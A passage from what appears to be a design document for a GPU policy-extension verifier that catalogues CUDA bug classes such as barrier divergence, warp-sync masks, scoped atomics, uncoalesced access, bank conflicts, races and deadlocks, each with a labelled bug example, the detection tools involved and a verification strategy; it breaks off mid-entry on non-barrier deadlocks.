A block-wide barrier requires all threads in the block to reach it. If the barrier is placed under a condition that evaluates differently across threads, some threads wait forever → deadlock / kernel hang. This is treated as a first-class defect in GPU kernel verification (e.g., "barrier divergence" in GPUVerify), and is also one of the main CUDA synchronization bug types characterized/targeted by AuCS/Wu. Note that general control-flow divergence is a performance issue, but barrier divergence is the specific, critical case where divergent control flow causes threads to reach a barrier non-uniformly, turning a performance issue into a liveness/correctness failure (deadlock).

Bug example

__global__ void k(float* a) {
  if (threadIdx.x < 16) __syncthreads(); // divergent barrier => UB / deadlock
  a[threadIdx.x] = 1.0f;
}

Seen in / checked by

GPUVerify: checking divergence is a core goal ("divergence freedom").(Nathan Chong)
Simulee detects barrier divergence bugs in real-world code.(zhangyuqun.github.io)
Wu et al.: explicitly defines barrier divergence and places it under improper synchronization.(arXiv)
Tools like Compute Sanitizer synccheck report "divergent thread(s) in block"; Oclgrind can also detect barrier divergence (OpenCL).

Checking approach

Static check (GPUVerify-style): prove that each barrier is reached by all threads in the relevant scope, often via uniformity reasoning.(Nathan Chong)
Dynamic check: synccheck-style runtime validation, and Simulee-style bug finding.(zhangyuqun.github.io)

Verification strategy

Require warp-/block-uniform control flow for any path reaching a barrier (GPUVerify-style uniform predicate analysis): the verifier statically proves that every __syncthreads() is reached by all threads in the block, otherwise reject. This allows policies to use barriers for legitimate shared-memory coordination while preventing divergent barriers that cause deadlocks.

Verification scope analysis

Scope & Assurance: Extension-local (E), Static-sound. Enforcing uniform barrier placement via static analysis prevents barrier divergence with strong soundness. Policies can use __syncthreads() when the verifier can prove all threads in the block reach the barrier uniformly.

Production guarantee: The verifier statically analyzes control flow to ensure every __syncthreads() call is reached by all threads in the block. Barriers under divergent conditions (e.g., if (threadIdx.x < 16) __syncthreads()) are rejected. This allows safe barrier usage for shared-memory coordination while preventing GPU hangs.

Offline/CI tools: For kernel-level analysis, GPUVerify proves divergence freedom via static verification; Compute Sanitizer synccheck detects divergent barriers at runtime; Simulee finds barrier divergence bugs through evolutionary simulation.

Residual gap: Some safe barrier placements under complex but provably uniform conditions may be conservatively rejected. The verifier guarantees policy cannot introduce barrier divergence, but cannot guarantee the kernel itself is free of this bug; kernel-level bugs require kernel-level tools.

2) Invalid Warp Synchronization (`__syncwarp` mask, warp-level barriers) [Safety, GPU-specific]

What it is / why it matters

Warp-level sync requires correct participation masks. A common failure is calling __syncwarp(mask) where not all lanes that reach the barrier are included in mask, or where divergence causes only a subset to arrive.

Bug example

__global__ void k(int* out) {
  int lane = threadIdx.x & 31;
  if (lane < 16) {
    __syncwarp(0xffffffff);  // only 16 lanes arrive, but mask expects all 32
  }
  out[threadIdx.x] = lane;
}

Seen in / checked by

Compute Sanitizer synccheck explicitly reports "Invalid arguments" and "Divergent thread(s) in warp" classes for these hazards.(NERSC Documentation)
iGUARD discusses how newer CUDA features (e.g., independent thread scheduling + cooperative groups) create new race/sync hazards beyond the classic model.(Aditya K Kamath)

Checking approach

Runtime validation via synccheck.
Static analysis to verify mask correctness at each __syncwarp callsite.

Verification strategy

If policies can ever emit warp-level sync or cooperative-groups barriers, require a verifiable mask discipline: e.g., only __syncwarp(0xffffffff) (full mask) or masks proven to equal the active mask at the callsite. Otherwise, simplest is: ban warp sync primitives entirely inside policies.

Verification scope analysis

Scope & Assurance: Extension-local (E), By-construction. Banning __syncwarp/CG barriers entirely (or requiring only full-mask sync at provably uniform points) makes invalid warp sync structurally impossible, providing perfect soundness with high completeness for policy use cases where warp-level sync is rarely needed.

Production guarantee: Policy code cannot introduce invalid warp synchronization because the verifier bans warp-level sync primitives. If allowed, only full-mask __syncwarp(0xffffffff) at provably uniform points is permitted.

Offline/CI tools: Compute Sanitizer synccheck reports invalid sync arguments and divergent warps at runtime; iGUARD provides NVBit-based instrumentation for detecting sync hazards from modern CUDA features.

Residual gap: iGUARD notes that ITS (Independent Thread Scheduling) and CG create new hazards that even experienced developers misuse. This justifies conservative restrictions; banning these primitives in policy code is the only sound approach without complex ITS-aware analysis.

3) Insufficient Atomic/Sync Scope [Correctness, GPU-specific]

What it is / why it matters

GPU adds scope and memory-model subtleties that don't exist on CPUs. Scoped races occur when synchronization/atomics are done at an insufficient scope (e.g., using atomicAdd_block when atomicAdd with device scope is needed). This is a distinct GPU bug class because scope semantics are unique to CUDA's memory model.

Bug example

// Scoped race: using block-scope atomic when device-scope is needed
__global__ void k(int* counter) {
  atomicAdd_block(counter, 1);  // only block-scope, may race across blocks
}

Seen in / checked by

ScoRD introduces scoped races due to insufficient scope and argues this is a distinct bug class.(CSA - IISc Bangalore)
iGUARD further targets races introduced by "scoped synchronization" and advanced CUDA features (independent thread scheduling, cooperative groups).(Aditya K Kamath)

Checking approach

Scope verification: ensure atomics/sync use sufficient scope for the access pattern.
Require explicit scope annotations and validate against access patterns.

Verification strategy

Treat scope as part of the verifier contract: if policies do atomic/synchronizing operations, require the strongest allowed scope (or forbid nontrivial scope usage). Practically: ban cross-block shared global updates unless they're done through a small set of "safe" helpers (e.g., per-SM/per-warp buffers → host aggregation). If policies use scoped atomics, require the scope to be explicit and conservative.

Verification scope analysis

Scope & Assurance: Combined → Extension-local (C→E) via state isolation, Static-sound. If policies can touch kernel-shared global objects, scope correctness depends on kernel access patterns (Combined). However, this reduces to Extension-local by restricting policies to write only policy-owned state or requiring all atomics to use device-scope by default, providing strong soundness with medium completeness (policies needing block-scope atomics must use conservative device-scope).

Production guarantee: Two design choices enable Extension-local verification: (A) Policy only writes policy-owned state (maps, ringbuffers), never kernel globals: scope becomes irrelevant; (B) All policy atomics use device-scope by default: sufficient for any access pattern. Both approaches eliminate scope bugs without kernel inspection.

Offline/CI tools: ScoRD introduces "scoped races" as a distinct bug class and provides detection (research prototype requiring hardware support); iGUARD targets races from scoped synchronization and advanced CUDA features via NVBit GPU-side runtime instrumentation.

Residual gap: If policies must write kernel-shared objects with fine-grained scope optimization, Combined analysis or contracts are required. ScoRD and iGUARD emphasize scope bugs are subtle and underdetected: defaulting to device-scope is a sound engineering choice.

4) Warp-divergence Race [Correctness, GPU-specific]

What it is / why it matters

A warp-divergence race is a GPU-specific phenomenon where divergence changes which threads are effectively concurrent, producing racy outcomes that don't map cleanly to CPU assumptions. SIMT execution order + reconvergence can create subtle concurrency patterns. This is one reason "CPU-style race reasoning" doesn't port directly to GPUs. While control-flow divergence is generally a performance issue (serialized execution paths), warp-divergence race is a correctness issue where divergence creates unexpected concurrency patterns leading to data races: same root cause, but different failure modes: perf degradation vs. racy/undefined behavior.

Bug example

__global__ void k(int* A) {
  int lane = threadIdx.x & 31;
  if (lane < 16) A[0] = 1;      // first half writes
  else           A[0] = 2;      // second half writes
  // outcome depends on SIMT execution + reconvergence
}

Seen in / checked by

GKLEE explicitly lists "warp-divergence race" among discovered bug classes.(Lingming Zhang)
Simulee stresses CUDA-aware race definitions and discusses GPU-specific race interpretation constraints (e.g., avoiding false positives due to warp lockstep).(zhangyuqun.github.io)

Checking approach

Verifier rule: treat "lane-divergent side effects" as forbidden unless proven safe.
Require that any helper with side effects is guarded by a warp-uniform predicate or executed only by a designated lane (e.g., lane0). Then the verifier only needs to prove uniformity (or single-lane execution), not full SIMT interleavings.

Verification strategy

Enforce warp-uniform control flow for policy side effects. If divergence is unavoidable, force "single-lane execution" patterns where only lane0 performs the side effect. This eliminates warp-divergence races by construction.

Verification scope analysis

Scope & Assurance: Extension-local (E), Static-sound. Warp-divergence races arise from SIMT execution semantics, but can be prevented by structural restrictions on policy code, providing strong soundness with medium completeness (legitimately safe lane-divergent writes are rejected).

Production guarantee: The verifier enforces that all side-effecting operations are either (1) under warp-uniform predicates, or (2) executed only by lane0 (single-lane execution pattern). This eliminates warp-divergence races without analyzing the kernel. The verifier proves uniformity or single-lane execution statically.

Offline/CI tools: GKLEE explicitly lists "warp-divergence race" among discovered bug classes and explores divergent execution paths via concolic/symbolic testing; Simulee uses CUDA-aware race definitions that account for warp lockstep behavior to avoid false positives.

Residual gap: Policies with legitimately safe lane-divergent writes will be rejected. This trade-off is favorable: warp-divergence races are notoriously subtle: GKLEE found them in real SDK code: eliminating by construction is safer than complex SIMT interleaving analysis.

5) Uncoalesced / Non-Coalesceable Global Memory Access Patterns [Performance, GPU-specific]

What it is / why it matters

Warp memory coalescing is a GPU-specific performance contract. "Uncoalesced" accesses can cause large slowdowns (memory transactions split into many).

Bug example

__global__ void k(float* a, int stride) {
  int tid = blockIdx.x * blockDim.x + threadIdx.x;
  float x = a[tid * stride];   // stride>1 => likely uncoalesced
  a[tid * stride] = x + 1.0f;
}

Seen in / checked by

GPUDrano: "detects uncoalesced global memory accesses" and treats them as performance bugs.(GitHub, CAV17)
GKLEE: reports "non-coalesced memory accesses" as performance bugs it finds.(Lingming Zhang)
GPUCheck: detects "non-coalesceable memory accesses."(WebDocs)

Checking approach

Static analysis (GPUDrano/GPUCheck-style): analyze address expressions in terms of lane-to-address stride; flag when stride exceeds coalescing thresholds.(CAV17)

Verification strategy

If you want "performance as correctness," this is a flagship rule: restrict policy memory ops to patterns provably coalesced (e.g., affine, lane-linear indexing with small stride), and/or require warp-level aggregation so only one lane performs global updates. Require map operations to use warp-uniform keys or contiguous per-lane indices (e.g., base + lane_id), not random hashes. If policies must do random accesses, restrict them to lane0 only, amortizing the uncoalesced behavior to 1 lane/warp.

Verification scope analysis

Scope & Assurance: Extension-local (E) for policy-owned memory; Combined (C) for kernel arrays. Static-sound for policy memory: affine/lane-linear indexing guarantees coalescing with strong soundness but low completeness (random-access patterns rejected; kernel-array reads require Combined analysis).

Production guarantee: For policy-owned memory (maps, ringbuffers), restricting index expressions to affine/lane-linear forms (base + lane_id) or lane0-only access provides bounded overhead guarantees. Warp-level aggregation (only lane0 performs global updates) amortizes uncoalesced behavior to 1 lane/warp. The verifier cannot guarantee coalescing for kernel-array reads without kernel knowledge.

Offline/CI tools: GPUDrano statically detects uncoalesced global memory accesses and treats them as performance bugs; GPUCheck identifies non-coalesceable access patterns via thread-divergent expression analysis; GKLEE reports "non-coalesced memory accesses" as performance bugs via symbolic exploration.

Residual gap: True coalescing depends on hardware cache behavior and concurrent workloads: static analysis provides structural guarantees, not tight performance bounds. "Is it really slow / how slow" is architecture-dependent; static tools provide sound-ish structural warnings rather than tight performance proofs.

6) Control-Flow Divergence (warp branch divergence) [Performance, GPU-specific]

What it is / why it matters

SIMT divergence serializes paths within a warp, lowering "branch efficiency" and increasing worst-case overhead. This entry focuses on divergence as a performance issue. However, divergence is also the root cause of more severe correctness bugs: barrier divergence (deadlock when barriers are in conditional code) and warp-divergence races (unexpected concurrency patterns leading to data races).

Bug example

__global__ void k(float* out, float* in) {
  int tid = blockIdx.x * blockDim.x + threadIdx.x;
  if ((tid & 1) == 0) out[tid] = in[tid] * 2;
  else                out[tid] = in[tid] * 3;  // divergence within warp
}

Seen in / checked by

GPUCheck explicitly targets "branch divergence" as a performance problem arising from thread-divergent expressions.(WebDocs)
GKLEE: "divergent warps" as performance bugs.(Lingming Zhang)
Wu et al.: "non-optimal implementation" includes performance loss causes like branch divergence.(arXiv)

Checking approach

Static taint + symbolic reasoning (GPUCheck-style): identify conditions dependent on thread/lane id, and prove whether divergence is possible.(WebDocs)

Verification strategy

Divergence is the core reason you can treat performance as correctness. Enforce warp-uniform control flow for policies (or at least for any code path that triggers side effects / heavy helpers). If you can't prove uniformity, force "single-lane execution" of policy side effects (others become no-ops) to prevent warp amplification. Put a hard cap on the number of helper calls on any path, to bound the "divergence amplification factor."

Verification scope analysis

Scope & Assurance: Extension-local (E), Static-sound. Control-flow divergence is determined entirely by the policy's branch conditions and their dependence on thread IDs, providing strong soundness via taint analysis but low completeness (data-dependent branches that happen to be uniform at runtime are rejected).

Production guarantee: The verifier tracks which values depend on threadIdx/laneId (taint analysis). Branches on tainted values are either forbidden or force single-lane execution for side effects (others become no-ops). This bounds the "warp amplification factor" and prevents SIMT-amplified performance degradation.

Offline/CI tools: GPUCheck explicitly targets "branch divergence" as a performance problem via thread-divergent expression analysis; GKLEE reports "divergent warps" as performance bugs via symbolic exploration.

Residual gap: Some safe data-dependent branches will be rejected. The gpu_ext design principle lists warp-uniform control flow as a load-time verification requirement: treating divergence as a correctness property (bounded overhead), not just optimization. For kernel-level divergence analysis, use GPUCheck or GKLEE.

7) Shared-Memory Bank Conflicts [Performance, GPU-specific]

What it is / why it matters

Bank conflicts are a shared-memory–specific performance pathology: accesses serialize when multiple lanes hit the same bank.

Bug example

__global__ void k(int* out) {
  __shared__ int s[32*32];
  int lane = threadIdx.x & 31;
  // stride hits same bank pattern (illustrative)
  int x = s[lane * 32];
  out[threadIdx.x] = x;
}

Seen in / checked by

GKLEE explicitly lists "memory bank conflicts" among detected performance bugs.(Peng Li's Homepage)

Checking approach

Static heuristic: classify shared-memory index expressions by lane stride and bank mapping; warn if likely conflict.

Verification strategy

If policies use shared scratchpads (e.g., per-block staging), enforce a conflict-free access pattern (e.g., contiguous per-lane indexing such as base + threadIdx.x). A static heuristic can classify shared-memory index expressions by lane stride and bank mapping, rejecting or warning on patterns likely to cause conflicts. Shared memory should not be banned entirely for this performance issue—it remains useful for legitimate policy scratchpads.

Verification scope analysis

Scope & Assurance: Extension-local (E), Static-heuristic. Enforcing conflict-free access patterns on shared memory eliminates most bank conflicts while still allowing policies to use shared scratchpads for legitimate purposes.

Production guarantee: Policies using shared memory are restricted to conflict-free index patterns (base + threadIdx.x for contiguous access). The verifier statically checks shared-memory index expressions and rejects patterns with likely bank conflicts (e.g., stride-32 access). This preserves shared memory availability for per-block staging and aggregation.

Offline/CI tools: GKLEE explicitly lists "memory bank conflicts" among detected performance bugs via symbolic exploration.

Residual gap: Some safe but complex index patterns may be conservatively rejected. Kernel-level bank conflict analysis requires GPUDrano-style static tools or profiling. Policies needing non-trivial shared-memory access patterns may need to demonstrate conflict-freedom through annotations or simplified indexing.

8) Block-Size Dependence [Correctness, GPU-specific]

What it is / why it matters

Block-size independence is essential for safe block-size tuning. Kernels that implicitly depend on specific blockDim values can produce incorrect results or races when launched with different configurations. This is critical for auto-tuning and portability across GPU generations. This entry focuses on compile-time hardcoded assumptions within the kernel code itself (e.g., fixed shared memory sizes, hardcoded reduction strides), distinct from runtime launch configuration assumptions about grid dimensions.

Bug example

__global__ void reduce(float* out, float* in) {
  __shared__ float s[256];
  int tid = threadIdx.x;
  s[tid] = in[blockIdx.x * blockDim.x + tid];
  __syncthreads();
  // Hardcoded reduction assumes exactly 256 threads
  if (tid < 128) s[tid] += s[tid + 128];  // OOB read if blockDim.x < 256
  __syncthreads();                         // incomplete reduction if blockDim.x > 256
  if (tid < 64) s[tid] += s[tid + 64];
  // ... continues with warp-level reduction ...
  if (tid == 0) out[blockIdx.x] = s[0];
}
// Launched with blockDim.x != 256 => wrong results or crash

Seen in / checked by

GPUDrano explicitly includes "block-size independence" analysis.(GitHub)

Checking approach

Static analysis (GPUDrano): analyze kernel code for implicit blockDim dependencies.
Require explicit declaration of block-size assumptions in kernel metadata.

Verification strategy

Policies should not implicitly assume block shapes unless the verifier can guarantee them. If a policy depends on block-level structure, require declaring it (metadata) and validate at attach time. Add verifier rules that forbid hard-coded assumptions about blockDim unless explicitly declared.

Verification scope analysis

Scope & Assurance: Extension-local (E) if block-agnostic; Combined (C) if assumes blockDim. Contract-based for blockDim-dependent policies: conditional soundness (sound if declared requirements match actual launch config) with high completeness (policies can declare requirements; undeclared policies assumed block-agnostic).

Production guarantee: Two approaches enable verification: (A) Block-agnostic design: policies use only lane-local or warp-level logic, avoiding blockDim dependencies entirely, making them safe for any launch config; (B) Contract-based: policies declare block-size requirements in metadata, and the runtime validates at attach time. The verifier rejects policies with hardcoded block-size constants unless explicitly declared.

Offline/CI tools: GPUDrano explicitly includes "block-size independence" analysis for detecting implicit blockDim dependencies in kernel code.

Residual gap: Policies with undeclared blockDim dependencies may fail silently with different launch configs. The contract approach shifts responsibility to policy authors to declare requirements correctly. Recommended design: make policy APIs block-agnostic (use relative indices, not absolute sizes).

9) Launch Config Assumptions [Correctness, GPU-specific]

What it is / why it matters

Many CUDA kernels assume certain launch configurations (e.g., single block, specific grid dimensions). Violating these assumptions leads to incorrect results or races that are hard to diagnose. This entry focuses on runtime launch configuration assumptions (gridDim, number of blocks), distinct from compile-time hardcoded block-size dependencies within the kernel code.

Bug example

__global__ void reduce(float* out, float* in, int n) {
  __shared__ float s[256];
  int tid = threadIdx.x;
  int i = blockIdx.x * blockDim.x + tid;
  s[tid] = (i < n) ? in[i] : 0.0f;
  __syncthreads();
  for (int stride = blockDim.x / 2; stride > 0; stride >>= 1) {
    if (tid < stride) s[tid] += s[tid + stride];
    __syncthreads();
  }
  if (tid == 0) {
    *out = s[0];  // BUG: assumes gridDim.x == 1, writes final result directly
  }              // if gridDim.x > 1, multiple blocks race on *out
}
// Called with <<<N/256, 256>>> where N > 256 => data race, wrong result

Seen in / checked by

Wu et al.'s discussion of detected bugs includes developer responses that kernels "should not be called with more than one block" and suggests adding assertions like assert(gridDim.x == 1).(arXiv)

Checking approach

Contract checking: encode launch preconditions (gridDim, blockDim assumptions) and enforce them at runtime or statically.
Add runtime assertions for grid/block dimension assumptions.

Verification strategy

If policy code assumes a particular block/warp mapping (e.g., keys use threadIdx.x directly), you can end up with correctness or performance regressions when kernels run under different launch configs. If a policy depends on warp- or block-level structure, require declaring it (metadata) and validate at attach time.

Verification scope analysis

Scope & Assurance: Combined (C): launch configuration is host-determined, not visible to policy verifier. Contract-based assurance: conditional soundness (sound only if contracts are correctly specified and validated) with completeness depending on contract expressiveness.

Production guarantee: This bug class fundamentally requires contracts: Extension-local verification cannot see launch parameters. The policy declares preconditions (e.g., "requires gridDim.x == 1" or "requires blockDim.x >= 128"), and the runtime validates at attach/launch time. Policies without explicit requirements are assumed to work with any config.

Offline/CI tools: Wu et al.'s empirical study found real bugs where developers noted kernels "should not be called with more than one block": they suggest adding runtime assertions like assert(gridDim.x == 1). Convert such requirements into contract metadata for policy verification.

Residual gap: Contract-based verification shifts responsibility to policy authors to declare requirements correctly. This is one of the few bug classes where Combined verification is unavoidable, but contracts provide a clean interface without requiring complex joint analysis of kernel + policy.

10) Missing Volatile/Fence [Correctness, GPU-specific]

What it is / why it matters

GPU code often relies on compiler and memory-model subtleties. GKLEE reports a real-world category: forgetting to mark a shared memory variable as volatile, producing stale reads/writes due to compiler optimization or caching behavior. This is a GPU-flavored instance of memory visibility/ordering bugs that can be hard to reproduce.(Lingming Zhang)

Bug example

__shared__ int flag;          // should sometimes be volatile / properly fenced
if (tid == 0) flag = 1;
__syncthreads();
while (flag == 0) { }         // may spin if compiler hoists load / visibility issues

Seen in / checked by

GKLEE explicitly lists "forgot volatile" as a discovered bug type.(Lingming Zhang)
Simulee and other tools' race detection can surface some of these issues when they manifest as data races.(zhangyuqun.github.io)

Checking approach

Symbolic exploration (GKLEE-style): explore memory access orderings and detect stale read scenarios.(Lingming Zhang)
Pattern-based linting: flag spin-wait loops on shared memory without volatile or fence.

Verification strategy

Avoid exposing raw shared/global memory communication to policies; instead provide helpers with explicit semantics (e.g., "atomic increment" or "write once" patterns), and verify policies don't implement ad-hoc synchronization loops. Forbid spin-waiting on shared memory in policy code.

Verification scope analysis

Scope & Assurance: Extension-local (E), By-construction. Banning spin-wait loops and raw shared/global memory communication eliminates volatile/fence bugs entirely, providing perfect soundness with high completeness (legitimate polling patterns are rare in policy code).

Production guarantee: The verifier bans spin-wait loops (while(flag == 0)), flag polling patterns, and raw shared/global memory communication. All inter-thread communication must go through atomic helpers with explicit semantics (e.g., "atomic increment" or "write once" patterns). This eliminates volatile/fence bugs by forbidding the patterns that cause them.

Offline/CI tools: GKLEE explicitly lists "forgot volatile" as a discovered bug type via symbolic exploration. Simulee and other race detectors can surface these issues when they manifest as data races.

Residual gap: ITS (Independent Thread Scheduling) changes assumptions about warp-lockstep execution, making traditional volatile assumptions unreliable: code that worked on pre-Volta architectures may race on newer GPUs. The safest approach is to ban ad-hoc synchronization entirely rather than trying to verify memory model subtleties.

11) Shared-Memory Data Races (`shared`) [Correctness, GPU-specific]

What it is / why it matters

Threads in a block access on-chip shared memory concurrently; missing/incorrect synchronization causes races. This is a classic CUDA bug class (AuCS/Wu).

Bug example

__global__ void k(int* g) {
  __shared__ int s;
  int t = threadIdx.x;
  if (t == 0) s = 1;
  if (t == 1) s = 2;   // write-write race on s
  __syncthreads();
  g[t] = s;
}

Seen in / checked by

GPUVerify explicitly targets data-race freedom and defines intra-group / inter-group races.(Nathan Chong)
GKLEE reports finding races (and related deadlocks) via symbolic exploration.(Lingming Zhang)
Simulee detects data race bugs in real projects and uses a CUDA-aware notion of race.(zhangyuqun.github.io)
Wu et al. classify data race under "improper synchronization" as a CUDA-specific root cause.(arXiv)
Compute Sanitizer racecheck is a runtime shared-memory hazard detector.(Shinhwei)

Checking approach

Static verifier route (GPUVerify-style): enforce "race-free under SIMT" by proving that any two potentially concurrent lanes/threads cannot perform conflicting accesses without proper synchronization.(Nathan Chong)
Dynamic route (Simulee-style): instrument / simulate memory accesses and flag conflicting pairs; good for bug-finding and regression tests.(zhangyuqun.github.io)

Verification strategy

If policies have any shared state, require warp-uniform side effects or single-lane side effects (e.g., lane0 updates) plus explicit atomics. A conservative verifier rule is: policy code cannot write shared memory except via restricted helpers that are race-safe (e.g., per-warp aggregation).

Option A – warp-/block-uniform single-writer rules (e.g., "only lane 0 updates").
Option B – atomic-only helpers for shared objects.
Option C – per-thread/per-warp sharding (each lane updates its own slot).

Verification scope analysis

Scope & Assurance: Extension-local (E), Static-sound. Shared-memory races depend only on the policy's access patterns and synchronization, providing strong soundness via structural restrictions (per-lane sharding or lane0-only writes eliminate races by construction) with medium completeness (complex shared-memory algorithms rejected).

Production guarantee: Three options, all Extension-local: (A) Ban shared-memory writes entirely; (B) Require per-lane sharding: each lane writes its own slot, no conflicts possible; (C) Require lane0-only writes with atomic helpers. All three approaches make races impossible by construction without requiring complex GPUVerify-style interleaving proofs.

Offline/CI tools: GPUVerify explicitly targets data-race freedom as a core verification goal and defines intra-group/inter-group races; ESBMC-GPU checks data races via bounded model checking; Compute Sanitizer racecheck is a runtime shared-memory hazard detector; Simulee detects data race bugs using CUDA-aware race definitions; Wu et al. classify data race under "improper synchronization" as a CUDA-specific root cause.

Residual gap: GPUVerify-style proofs are possible but complex for arbitrary code; structural restrictions are simpler and equally sound for policy use cases. Policies needing complex shared-memory algorithms should use ringbuffers instead, avoiding shared memory entirely.

12) Redundant Barriers (unnecessary `__syncthreads`) [Performance, GPU-specific]

What it is / why it matters

A redundant barrier is a performance-pathology class: removing the barrier does not introduce a race, so the barrier was unnecessary overhead.

Bug example

__global__ void k(int* out) {
  __shared__ int s[256];
  int t = threadIdx.x;
  s[t] = t;             // no cross-thread dependence here
  __syncthreads();      // redundant
  out[t] = s[t];
}

Seen in / checked by

Wu et al.: defines "redundant barrier function."(arXiv)
Simulee: detects redundant barrier bugs and reports numbers across projects.(zhangyuqun.github.io)
AuCS: repairs synchronization bugs, including redundant barriers.(Shinhwei)
GPURepair tooling also exists to insert/remove barriers to fix races and remove unnecessary ones.(GitHub)

Checking approach

Static/dynamic dependence analysis: determine whether any read-after-write / write-after-read across threads is protected by the barrier; if not, barrier is removable (Simulee/AuCS angle).(zhangyuqun.github.io)

Verification strategy

Since barriers are allowed in policy code (with uniform placement enforced by #1), redundant barriers become a performance concern. Use static dependence analysis to detect barriers where no cross-thread data dependence exists between the preceding writes and subsequent reads. The verifier can warn about or reject redundant barriers to enforce bounded overhead as a correctness property, ensuring policies do not introduce unnecessary synchronization cost.

Verification scope analysis

Scope & Assurance: Extension-local (E), Static-heuristic. Static dependence analysis can identify barriers that protect no cross-thread memory dependence, flagging them as redundant. This provides good detection coverage for common patterns.

Production guarantee: The verifier performs dependence analysis on barrier sites: if no read-after-write or write-after-read across threads is protected by a barrier, the barrier is flagged as redundant and rejected. Combined with the policy overhead budget, this ensures barriers are only used when structurally necessary for shared-memory coordination.

Offline/CI tools: Simulee detects redundant barriers through evolutionary simulation; Wu et al. define "redundant barrier function" as a key synchronization bug type; GPURepair uses GPUVerify as an oracle to repair data races/barrier divergence and can remove unnecessary barriers.

Residual gap: Some barriers may appear redundant in isolation but are necessary for correctness under specific scheduling scenarios. Conservative analysis may retain some unnecessary barriers; profiling tools can identify remaining optimization opportunities at the kernel level.

13) Host-Device Asynchronous Data Races (API ordering bugs) [Correctness, GPU-specific]

What it is / why it matters

CUDA exposes async kernel launches/memcpy/events; host code can race with device work if synchronization is missing. This is a major real-world bug source in heterogeneous programs and is not covered by pure kernel-only verifiers.

Bug example

int* d_data;
cudaMalloc(&d_data, N * sizeof(int));
kernel<<<grid, block>>>(d_data);
// missing cudaDeviceSynchronize() here
int* h_data = (int*)malloc(N * sizeof(int));
cudaMemcpy(h_data, d_data, N * sizeof(int), cudaMemcpyDeviceToHost);  // race with kernel

Seen in / checked by

CuSan is an open-source detector for "data races between (asynchronous) CUDA calls and the host," using Clang/LLVM instrumentation plus ThreadSanitizer.(GitHub)

Checking approach

Dynamic detection (CuSan-style): instrument host-side CUDA API calls and detect ordering violations at runtime.

Verification strategy

If policies interact with host-visible buffers or involve asynchronous map copies, define a strict lifetime & ordering contract (e.g., "policy writes are only consumed after a guaranteed sync point"). For testing, integrate CuSan into CI for host-side integration tests of the runtime/loader.

Verification scope analysis

Scope & Assurance: Host+Device/System (H), Dynamic-only. These races involve host-side API calls (cudaMemcpy, kernel launch, synchronization) interacting with device execution: the policy verifier provides no soundness guarantees for this bug class (host API ordering is out of scope); completeness is N/A as this is fundamentally a host-side problem.

Production guarantee: The policy verifier cannot provide guarantees for this bug class. It can only ensure policy code doesn't introduce additional async semantics (e.g., policy writes are only visible after guaranteed sync points). Define strict lifetime & ordering contracts for policy-accessible buffers.

Offline/CI tools: CuSan is the primary tool: an open-source detector for "data races between (asynchronous) CUDA calls and the host," using Clang/LLVM instrumentation plus ThreadSanitizer. Integrate CuSan into CI for host-side integration tests of the runtime/loader.

Residual gap: Dynamic detection depends on test coverage: executed paths only. For production, implement runtime checks in the loader/driver for obvious violations (e.g., policy accessing freed memory, missing sync before host read). This is the H-track core tool requirement.

14) Atomic Contention [Performance, GPU-amplified]

What it is / why it matters

Heavy atomic contention is a classic "performance bug that behaves like a DoS" under massive parallelism. Even when correctness is preserved, contention on a single address can cause extreme slowdowns (orders of magnitude). With millions of threads, a single hot atomic can serialize execution and cause tail latency explosion.

Bug example

__global__ void k(int* counter) {
  // All threads atomically increment the same location => extreme contention
  atomicAdd(counter, 1);
}
// Called with <<<1000, 1024>>> => 1M threads contending on one address

Seen in / checked by

GPUAtomicContention: an open-source benchmark suite (2025) explicitly measuring atomic performance under contention and across different memory scopes (block/device/system) and access patterns.(GitHub)

Checking approach

Budget-based verification: limit atomic frequency per warp/block.
Benchmarking: use atomic contention benchmarks to calibrate safe budgets.
Static analysis: identify hot atomic targets and warn about contention risk.

Verification strategy

Treat "atomic frequency + contention risk" as a verifier-enforced budget: e.g., allow at most one global atomic per warp, or require warp-aggregated updates. For evaluation, you can reuse the open benchmark suite to calibrate "safe budgets" per GPU generation. Consider requiring warp-level reduction before global atomics to reduce contention by 32x.

Verification scope analysis

Scope & Assurance: Combined → Extension-local (C→E) via budgetization, Static-sound. Contention severity depends on both policy behavior (atomic frequency) and kernel behavior (concurrent atomics to same address), but this reduces to Extension-local by treating atomics as a budget, providing strong soundness for policy's contribution with medium completeness (high-throughput atomic patterns hit budget limits).

Production guarantee: The verifier treats "atomic frequency + contention risk" as a budget: (1) limit to N global atomics per warp per invocation; (2) require warp-aggregation (one atomic per warp instead of per-lane) for 32x contention reduction by construction; (3) forbid unbounded atomic loops. The budget provides bounded-overhead guarantees for policy's contribution regardless of kernel behavior.

Offline/CI tools: GPUAtomicContention is an open-source benchmark suite (2025) explicitly measuring atomic performance under contention across different memory scopes (block/device/system) and access patterns: use it to calibrate "safe budgets" per GPU generation.

Residual gap: Total system contention depends on concurrent workloads: the verifier bounds policy's contribution, not system-wide slowdown. "Making Powerful Enemies on NVIDIA GPUs" demonstrates adversarial kernels can systematically amplify interference through shared resource contention, making tight system-wide bounds impossible to guarantee statically.

15) Non-Barrier Deadlocks [Safety, GPU-amplified]

What it is / why it matters

Besides barrier divergence (which is specifically about __syncthreads under divergent control flow), SIMT lockstep can create deadlocks in other patterns that are unusual on CPUs: spin-waiting, lock contention within a warp, and named-barrier misuse. Warp-specialized kernels often use named barriers or structured synchronization patterns between warps/roles (producer/consumer). Bugs include: (a) spin deadlock due to missing signals, (b) unsafe barrier reuse ("recycling") across iterations, (c) races between producers/consumers.

Bug example (spin deadlock)

__global__ void k(int* flag, int* data) {
  // Block 0 expects Block 1 to set flag, but no global sync exists
  if (blockIdx.x == 0) while (atomicAdd(flag, 0) == 0) { }  // may spin forever
  if (blockIdx.x == 1) { data[0] = 42; /* forgot to set flag */ }
}

Bug example (named-barrier misuse, sketch)

// Producer writes buffer then signals barrier B
// Consumer waits on B then reads buffer
// Bug: consumer waits on wrong barrier instance / reused incorrectly in loop

Seen in / checked by

iGUARD notes that lockstep execution can deadlock if threads within a warp use distinct locks.(Aditya K Kamath)
GKLEE reports finding deadlocks via symbolic exploration of GPU kernels.(Lingming Zhang)
ESBMC-GPU models and checks deadlock too.(GitHub)
WEFT verifies deadlock freedom, safe barrier recycling, and race freedom for producer-consumer synchronization (named barriers).(zhangyuqun.github.io)

Checking approach

Protocol verification (WEFT-style): for specific synchronization patterns, prove deadlock freedom + race freedom + safe reuse. Model barrier instances across loop iterations and prove safe reuse.(zhangyuqun.github.io)
Symbolic exploration (GKLEE-style): explore possible interleavings and detect deadlock states.(Lingming Zhang)

Verification strategy

